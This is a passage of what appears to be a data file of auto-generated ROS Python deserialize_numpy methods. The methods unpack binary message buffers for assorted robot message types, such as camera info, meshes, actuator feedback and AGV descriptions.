_v111.encoding = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v111.encoding = str[start:end]\n _x = _v111\n start = end\n end += 5\n (_x.is_bigendian, _x.step,) = _get_struct_BI().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v111.data = str[start:end]\n _v114 = _v104.cam_info\n _v115 = _v114.header\n start = end\n end += 4\n (_v115.seq,) = _get_struct_I().unpack(str[start:end])\n _v116 = _v115.stamp\n _x = _v116\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = 
_get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v115.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v115.frame_id = str[start:end]\n _x = _v114\n start = end\n end += 8\n (_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v114.distortion_model = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v114.distortion_model = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n _v114.D = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 72\n _v114.K = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=9)\n start = end\n end += 72\n _v114.R = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=9)\n start = end\n end += 96\n _v114.P = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=12)\n _x = _v114\n start = end\n end += 8\n (_x.binning_x, _x.binning_y,) = _get_struct_2I().unpack(str[start:end])\n _v117 = _v114.roi\n _x = _v117\n start = end\n end += 17\n (_x.x_offset, _x.y_offset, _x.height, _x.width, _x.do_rectify,) = _get_struct_4IB().unpack(str[start:end])\n _v117.do_rectify = bool(_v117.do_rectify)\n _v118 = _v104.roi_box_pose\n _v119 = _v118.header\n start = end\n end += 4\n (_v119.seq,) = _get_struct_I().unpack(str[start:end])\n _v120 = _v119.stamp\n _x = _v120\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v119.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v119.frame_id = str[start:end]\n _v121 = _v118.pose\n _v122 = _v121.position\n _x = _v122\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n _v123 = _v121.orientation\n _x = _v123\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])\n _v124 = _v104.roi_box_dims\n _x = _v124\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.collision_name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1.collision_name = str[start:end]\n self.graspable_objects.append(val1)\n _x = self\n start = end\n end += 12\n (_x.image.header.seq, _x.image.header.stamp.secs, _x.image.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.image.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.image.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 8\n (_x.image.height, _x.image.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.image.encoding = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.image.encoding = str[start:end]\n _x = self\n start = end\n end += 5\n (_x.image.is_bigendian, _x.image.step,) = _get_struct_BI().unpack(str[start:end])\n start = end\n end += 4\n (length,) = 
_struct_I.unpack(str[start:end])\n start = end\n end += length\n self.image.data = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.camera_info.header.seq, _x.camera_info.header.stamp.secs, _x.camera_info.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_info.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.camera_info.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 8\n (_x.camera_info.height, _x.camera_info.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_info.distortion_model = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.camera_info.distortion_model = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.camera_info.D = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 72\n self.camera_info.K = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=9)\n start = end\n end += 72\n self.camera_info.R = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=9)\n start = end\n end += 96\n self.camera_info.P = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=12)\n _x = self\n start = end\n end += 25\n (_x.camera_info.binning_x, _x.camera_info.binning_y, _x.camera_info.roi.x_offset, _x.camera_info.roi.y_offset, _x.camera_info.roi.height, _x.camera_info.roi.width, _x.camera_info.roi.do_rectify,) = _get_struct_6IB().unpack(str[start:end])\n self.camera_info.roi.do_rectify = bool(self.camera_info.roi.do_rectify)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.meshes = []\n for i in range(0, length):\n val1 = shape_msgs.msg.Mesh()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.triangles = []\n for i in range(0, length):\n val2 = shape_msgs.msg.MeshTriangle()\n start = end\n end += 12\n val2.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3)\n val1.triangles.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.vertices = []\n for i in range(0, length):\n val2 = geometry_msgs.msg.Point()\n _x = val2\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n val1.vertices.append(val2)\n self.meshes.append(val1)\n _x = self\n start = end\n end += 56\n (_x.reference_to_camera.position.x, _x.reference_to_camera.position.y, _x.reference_to_camera.position.z, _x.reference_to_camera.orientation.x, _x.reference_to_camera.orientation.y, _x.reference_to_camera.orientation.z, _x.reference_to_camera.orientation.w,) = _get_struct_7d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.Class = str[start:end].decode('utf-8')\n else:\n self.Class = str[start:end]\n _x = self\n start = end\n end += 40\n (_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax,) = _get_struct_d4q().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) 
# most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.p1 is None:\n self.p1 = geometry_msgs.msg.PointStamped()\n if self.p2 is None:\n self.p2 = geometry_msgs.msg.PointStamped()\n if self.p3 is None:\n self.p3 = geometry_msgs.msg.PointStamped()\n if self.p4 is None:\n self.p4 = geometry_msgs.msg.PointStamped()\n end = 0\n _x = self\n start = end\n end += 16\n (_x.s1, _x.s2, _x.s3, _x.s4, _x.p1.header.seq, _x.p1.header.stamp.secs, _x.p1.header.stamp.nsecs,) = _struct_4B3I.unpack(str[start:end])\n self.s1 = bool(self.s1)\n self.s2 = bool(self.s2)\n self.s3 = bool(self.s3)\n self.s4 = bool(self.s4)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.p1.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.p1.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 36\n (_x.p1.point.x, _x.p1.point.y, _x.p1.point.z, _x.p2.header.seq, _x.p2.header.stamp.secs, _x.p2.header.stamp.nsecs,) = _struct_3d3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.p2.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.p2.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 36\n (_x.p2.point.x, _x.p2.point.y, _x.p2.point.z, _x.p3.header.seq, _x.p3.header.stamp.secs, _x.p3.header.stamp.nsecs,) = _struct_3d3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.p3.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.p3.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 36\n (_x.p3.point.x, _x.p3.point.y, _x.p3.point.z, _x.p4.header.seq, _x.p4.header.stamp.secs, _x.p4.header.stamp.nsecs,) = _struct_3d3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.p4.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.p4.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 24\n (_x.p4.point.x, _x.p4.point.y, _x.p4.point.z,) = _struct_3d.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 69\n (_x.Timestamp_sec, _x.Timestamp_nsec, _x.IdModulo, _x.InputVolA, _x.InputVolB, _x.InputCorrA, _x.InputCorrB, _x.OutputAnlg1, _x.OutputAnlg2, _x.InputDig1, _x.InputDig2, _x.InputDig3, _x.InputDig4, _x.OutputDig1, _x.OutputDig2, _x.OutputDig3, _x.OutputDig4, _x.OutputDig5, _x.OutputDig6, _x.OutputDig7, _x.OutputDig8,) = _get_struct_2ib6d12B().unpack(str[start:end])\n self.InputDig1 = bool(self.InputDig1)\n self.InputDig2 = bool(self.InputDig2)\n self.InputDig3 = bool(self.InputDig3)\n self.InputDig4 = bool(self.InputDig4)\n self.OutputDig1 = bool(self.OutputDig1)\n self.OutputDig2 = bool(self.OutputDig2)\n self.OutputDig3 = bool(self.OutputDig3)\n self.OutputDig4 = bool(self.OutputDig4)\n self.OutputDig5 = bool(self.OutputDig5)\n self.OutputDig6 = bool(self.OutputDig6)\n self.OutputDig7 = bool(self.OutputDig7)\n self.OutputDig8 = bool(self.OutputDig8)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 40\n (_x.h_min, _x.h_max, 
_x.s_min, _x.s_max, _x.v_min, _x.v_max,) = _get_struct_2I4d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.pan is None:\n self.pan = movo_msgs.msg.PanTiltActuatorFdbk()\n if self.tilt is None:\n self.tilt = movo_msgs.msg.PanTiltActuatorFdbk()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.pan.header.seq, _x.pan.header.stamp.secs, _x.pan.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.pan.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.pan.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 64\n (_x.pan.current, _x.pan.pos_rad, _x.pan.vel_rps, _x.pan.torque_nm, _x.pan.pwm, _x.pan.encoder_rad, _x.pan.accel.x, _x.pan.accel.y, _x.pan.accel.z, _x.pan.temperature_degC, _x.tilt.header.seq, _x.tilt.header.stamp.secs, _x.tilt.header.stamp.nsecs,) = _struct_6f3df3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.tilt.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.tilt.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 52\n (_x.tilt.current, _x.tilt.pos_rad, _x.tilt.vel_rps, _x.tilt.torque_nm, _x.tilt.pwm, _x.tilt.encoder_rad, _x.tilt.accel.x, _x.tilt.accel.y, _x.tilt.accel.z, _x.tilt.temperature_degC,) = _struct_6f3df.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.object1 = str[start:end].decode('utf-8')\n else:\n self.object1 = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.object2 = str[start:end].decode('utf-8')\n else:\n self.object2 = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.penetration_distance, _x.operation,) = _struct_di.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 4\n (self.numberOfTSPTurtles,) = _get_struct_i().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.des_gripper_pose is None:\n self.des_gripper_pose = geometry_msgs.msg.PoseStamped()\n if self.object_pose is None:\n self.object_pose = geometry_msgs.msg.PoseStamped()\n end = 0\n _x = self\n start = end\n end += 20\n (_x.manip_return_code, _x.object_grabber_return_code, _x.des_gripper_pose.header.seq, _x.des_gripper_pose.header.stamp.secs, 
_x.des_gripper_pose.header.stamp.nsecs,) = _get_struct_2i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.des_gripper_pose.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.des_gripper_pose.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 72\n (_x.des_gripper_pose.pose.position.x, _x.des_gripper_pose.pose.position.y, _x.des_gripper_pose.pose.position.z, _x.des_gripper_pose.pose.orientation.x, _x.des_gripper_pose.pose.orientation.y, _x.des_gripper_pose.pose.orientation.z, _x.des_gripper_pose.pose.orientation.w, _x.object_finder_return_code, _x.object_pose.header.seq, _x.object_pose.header.stamp.secs, _x.object_pose.header.stamp.nsecs,) = _get_struct_7di3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.object_pose.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.object_pose.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 56\n (_x.object_pose.pose.position.x, _x.object_pose.pose.position.y, _x.object_pose.pose.position.z, _x.object_pose.pose.orientation.x, _x.object_pose.pose.orientation.y, _x.object_pose.pose.orientation.z, _x.object_pose.pose.orientation.w,) = _get_struct_7d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.polygons is None:\n self.polygons = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.polygons = []\n for i in range(0, length):\n val1 = cob_3d_mapping_msgs.msg.CurvedPolygon()\n _v4 = val1.stamp\n _x = _v4\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (val1.ID,) = _struct_I.unpack(str[start:end])\n start = end\n end += 24\n val1.parameter = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=6)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.score = []\n for i in range(0, length):\n val2 = cob_3d_mapping_msgs.msg.SimilarityScore()\n _x = val2\n start = end\n end += 8\n (_x.ID, _x.prob,) = _struct_If.unpack(str[start:end])\n val1.score.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.polyline = []\n for i in range(0, length):\n val2 = cob_3d_mapping_msgs.msg.PolylinePoint()\n _x = val2\n start = end\n end += 12\n (_x.x, _x.y, _x.edge_prob,) = _struct_3f.unpack(str[start:end])\n val1.polyline.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.features = []\n for i in range(0, length):\n val2 = cob_3d_mapping_msgs.msg.Feature()\n _x = val2\n start = end\n end += 16\n (_x.x, _x.y, _x.z, _x.ID,) = _struct_3fI.unpack(str[start:end])\n val1.features.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.energy = 
str[start:end].decode('utf-8')\n else:\n val1.energy = str[start:end]\n start = end\n end += 4\n (val1.weight,) = _struct_f.unpack(str[start:end])\n self.polygons.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.goal_id is None:\n self.goal_id = actionlib_msgs.msg.GoalID()\n if self.goal is None:\n self.goal = coordinator.msg.ManipTaskGoal()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 8\n (_x.goal_id.stamp.secs, _x.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.goal_id.id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.goal_id.id = str[start:end]\n _x = self\n start = end\n end += 20\n (_x.goal.action_code, _x.goal.object_code, _x.goal.pickup_frame.header.seq, _x.goal.pickup_frame.header.stamp.secs, _x.goal.pickup_frame.header.stamp.nsecs,) = _get_struct_2i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.goal.pickup_frame.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.goal.pickup_frame.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.goal.pickup_frame.pose.position.x, _x.goal.pickup_frame.pose.position.y, _x.goal.pickup_frame.pose.position.z, _x.goal.pickup_frame.pose.orientation.x, _x.goal.pickup_frame.pose.orientation.y, _x.goal.pickup_frame.pose.orientation.z, _x.goal.pickup_frame.pose.orientation.w, _x.goal.dropoff_frame.header.seq, _x.goal.dropoff_frame.header.stamp.secs, _x.goal.dropoff_frame.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.goal.dropoff_frame.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.goal.dropoff_frame.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.goal.dropoff_frame.pose.position.x, _x.goal.dropoff_frame.pose.position.y, _x.goal.dropoff_frame.pose.position.z, _x.goal.dropoff_frame.pose.orientation.x, _x.goal.dropoff_frame.pose.orientation.y, _x.goal.dropoff_frame.pose.orientation.z, _x.goal.dropoff_frame.pose.orientation.w, _x.goal.gripper_goal_frame.header.seq, _x.goal.gripper_goal_frame.header.stamp.secs, _x.goal.gripper_goal_frame.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.goal.gripper_goal_frame.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.goal.gripper_goal_frame.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 60\n (_x.goal.gripper_goal_frame.pose.position.x, _x.goal.gripper_goal_frame.pose.position.y, _x.goal.gripper_goal_frame.pose.position.z, 
_x.goal.gripper_goal_frame.pose.orientation.x, _x.goal.gripper_goal_frame.pose.orientation.y, _x.goal.gripper_goal_frame.pose.orientation.z, _x.goal.gripper_goal_frame.pose.orientation.w, _x.goal.perception_source,) = _get_struct_7di().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.name = str[start:end].decode('utf-8')\n else:\n self.name = str[start:end]\n _x = self\n start = end\n end += 97\n (_x.visible, _x.x, _x.y, _x.z, _x.u, _x.v, _x.w, _x.phi, _x.theta, _x.psi, _x.p, _x.q, _x.r,) = _struct_B12d.unpack(str[start:end])\n self.visible = bool(self.visible)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.robot_id is None:\n self.robot_id = opil_v2.msg.Id()\n if self.agv_msg is None:\n self.agv_msg = opil_v2.msg.RobotDescriptionAGV()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.robot_id.id,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.robot_id.description = str[start:end].decode('utf-8')\n else:\n self.robot_id.description = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.agv_msg.header.seq, _x.agv_msg.header.stamp.secs, _x.agv_msg.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.agv_msg.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.agv_msg.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.agv_msg.vehicle_id.id,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.agv_msg.vehicle_id.description = str[start:end].decode('utf-8')\n else:\n self.agv_msg.vehicle_id.description = str[start:end]\n _x = self\n start = end\n end += 84\n (_x.agv_msg.left_size, _x.agv_msg.right_size, _x.agv_msg.front_size, _x.agv_msg.rear_size, _x.agv_msg.min_height, _x.agv_msg.max_height, _x.agv_msg.payload, _x.agv_msg.max_pos_x_vel, _x.agv_msg.max_neg_x_vel, _x.agv_msg.max_pos_x_acc, _x.agv_msg.max_neg_x_acc, _x.agv_msg.max_pos_y_vel, _x.agv_msg.max_neg_y_vel, _x.agv_msg.max_pos_y_acc, _x.agv_msg.max_neg_y_acc, _x.agv_msg.max_pos_ang_vel, _x.agv_msg.max_neg_ang_vel, _x.agv_msg.velocity_control_sensitivity, _x.agv_msg.min_turning_radius, _x.agv_msg.batt_capacity, _x.agv_msg.batt_max_voltage,) = _get_struct_21f().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.agv_msg.vehicle_type = str[start:end].decode('utf-8')\n else:\n self.agv_msg.vehicle_type = str[start:end]\n start = end\n end += 4\n (length,) = 
_struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.agv_msg.vendor = str[start:end].decode('utf-8')\n else:\n self.agv_msg.vendor = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.agv_msg.action_capability = []\n for i in range(0, length):\n val1 = opil_v2.msg.RobotAction()\n _x = val1\n start = end\n end += 2\n (_x.category, _x.action,) = _get_struct_2B().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.attributes = []\n for i in range(0, length):\n val2 = opil_v2.msg.Tuple()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.type = str[start:end].decode('utf-8')\n else:\n val2.type = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.value = str[start:end].decode('utf-8')\n else:\n val2.value = str[start:end]\n val1.attributes.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.description = str[start:end].decode('utf-8')\n else:\n val1.description = str[start:end]\n self.agv_msg.action_capability.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 11\n (_x.partial_view, _x.resolution, _x.type, _x.use_simple_occlusion, _x.add_point_colors,) = _struct_B2i2B.unpack(str[start:end])\n self.partial_view = bool(self.partial_view)\n self.use_simple_occlusion = bool(self.use_simple_occlusion)\n self.add_point_colors = bool(self.add_point_colors)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 44\n (_x.date, _x.time, _x.longitude_RTK, _x.latitude_RTK, _x.height_above_sea_RTK, _x.velocity_north, _x.velocity_east, _x.velocity_ground, _x.yaw, _x.position_flag, _x.yaw_flag,) = _struct_2I2d4fh2B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.t_start is None:\n self.t_start = genpy.Time()\n if self.duration is None:\n self.duration = genpy.Duration()\n end = 0\n _x = self\n start = end\n end += 65\n (_x.x, _x.y, _x.z, _x.yaw, _x.v_des, _x.a_des, _x.t_start.secs, _x.t_start.nsecs, _x.duration.secs, _x.duration.nsecs, _x.relative,) = _get_struct_6d2I2iB().unpack(str[start:end])\n self.relative = bool(self.relative)\n self.t_start.canon()\n self.duration.canon()\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 24\n self.thumb = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.index = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.middle = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.ring = 
numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.little = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 64\n (_x.max_features, _x.window_size, _x.quality, _x.min_distance, _x.harris, _x.size_block, _x.pyramid_lvl, _x.mask_border,) = _get_struct_2q3d3q().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.accelerometer is None:\n self.accelerometer = None\n if self.gyro is None:\n self.gyro = None\n if self.orientation is None:\n self.orientation = None\n if self.led_color is None:\n self.led_color = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.name = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.name.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = 